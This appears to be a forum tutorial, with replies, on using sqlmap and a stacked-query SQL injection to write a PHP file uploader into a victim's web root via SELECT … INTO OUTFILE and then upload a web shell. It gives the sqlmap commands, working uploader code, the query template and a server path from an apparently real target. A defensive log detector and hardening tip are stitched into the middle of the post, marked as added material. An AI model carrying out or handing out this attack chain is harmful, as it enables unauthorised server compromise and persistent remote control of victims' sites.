Today I will explain how to create a PHP shell from a SQL injection bug using the sqlmap tool.
Requirements:
sqlmap
SQL injection bug with stacked queries
Current-User: Root / SA / None
1- (Linux User) ./sqlmap.py -u TARGET.com/bug.php?id=1 --current-user
(Windows user) sqlmap.py -u TARGET.com/bug.php?id=1 --current-user
Current-user = NONE / ROOT
2- Now we need an FPD (Full Path Disclosure)
In my case this is the FPD:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /espejo/htdocs.v2/portalnuevo/buscadores/portal_contenidos.php on line 79
3- Now we need an uploader; in my case it is a PHP uploader (this server runs PHP).
Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>
OK, we go to a "Convert String To Hexadecimal" online tool and encode the uploader to hex.
This hex string is the encoded uploader; it is what goes into the query in the next step.
4- (Windows user) sqlmap.py -u TARGET.com/bug.php?id=1 --sql-shell
and we receive something like this (see the screenshot):
OK, we now have control of the victim's SQL server. The next command follows this template:
SELECT 0x<HEX code> INTO OUTFILE "<full path>/<uploader name>"
In my case it is:
Code:
select 0x<hex-encoded uploader> into outfile "/espejo/htdocs.v2/portalnuevo/buscadores/upload.php";
If sqlmap echoes the uploader's code back in green (as in my screenshot), everything went well.
Now we go to the chosen path and the uploader is on the server. From here we can upload a PHP shell and do everything you would do with any other PHP shell.
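From the defender's side, the step above leaves a very recognisable trace in the MySQL general log: a SELECT that writes a long hex literal to a file under the web root. The following detector is an added example, not part of the original post; it runs over constructed general-log lines (the log format and sample paths are assumptions) and flags that query shape.

```python
import re

# Shape of the query used in the post: a SELECT whose result is written to a
# file with INTO OUTFILE / INTO DUMPFILE; group 1 captures the target path.
OUTFILE_RE = re.compile(
    r"\bSELECT\b.*?\bINTO\s+(?:OUTFILE|DUMPFILE)\s+['\"]([^'\"]+)['\"]",
    re.IGNORECASE | re.DOTALL)
HEX_LITERAL_RE = re.compile(r"\b0x[0-9a-fA-F]{16,}\b")
SCRIPT_EXT_RE = re.compile(r"\.(php|phtml|jsp|asp|aspx)$", re.IGNORECASE)
# MySQL general log, file format: "<timestamp>\t<thread_id> Query\t<sql>"
GENERAL_LOG_RE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$", re.DOTALL)


def classify_query(sql):
    """Return a finding for a file-writing SELECT, or None.
    'high' when the statement also carries a long hex literal or targets a
    script extension (both true for the hex-encoded uploader the post writes),
    'medium' for any other INTO OUTFILE/DUMPFILE."""
    m = OUTFILE_RE.search(sql)
    if not m:
        return None
    path = m.group(1)
    reasons = ["writes a file via INTO OUTFILE/DUMPFILE"]
    if HEX_LITERAL_RE.search(sql):
        reasons.append("long hex literal payload")
    if SCRIPT_EXT_RE.search(path):
        reasons.append("target path has a script extension")
    return {"path": path, "reasons": reasons,
            "severity": "high" if len(reasons) > 1 else "medium"}


def scan_general_log(lines):
    """Apply classify_query to each general-log Query entry, tagging thread id."""
    findings = []
    for line in lines:
        m = GENERAL_LOG_RE.match(line)
        f = classify_query(m.group(2)) if m else None
        if f:
            f["thread_id"] = int(m.group(1))
            findings.append(f)
    return findings


# Constructed sample general-log lines (not taken from any real server).
SAMPLE_LOG = [
    "2024-01-01T10:00:00.000000Z\t   12 Query\tSELECT titulo FROM contenidos WHERE id = 1",
    "2024-01-01T10:00:05.000000Z\t   12 Query\tSELECT 0x41414141414141414141414141414141 "
    "INTO OUTFILE \"/var/www/htdocs/upload.php\"",
    "2024-01-01T10:01:00.000000Z\t   13 Query\tSELECT name INTO OUTFILE '/tmp/export.csv' FROM users",
]
```

On the server side, setting MySQL's secure_file_priv to a directory outside the web root (or to NULL, which disables file output entirely) stops INTO OUTFILE from reaching document-root paths like the one in the post.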
Sorry for my English, I'm Argentinian.
Regards to all Pakbugs users (:
Hey dude!!! Let's chat about techniques and other stuff..
Hi, I'm getting a message like this when I follow your steps:
[WARNING] execution of custom SQL queries is only available when stacked queries are supported
Can you tell me what the issue is?
greats.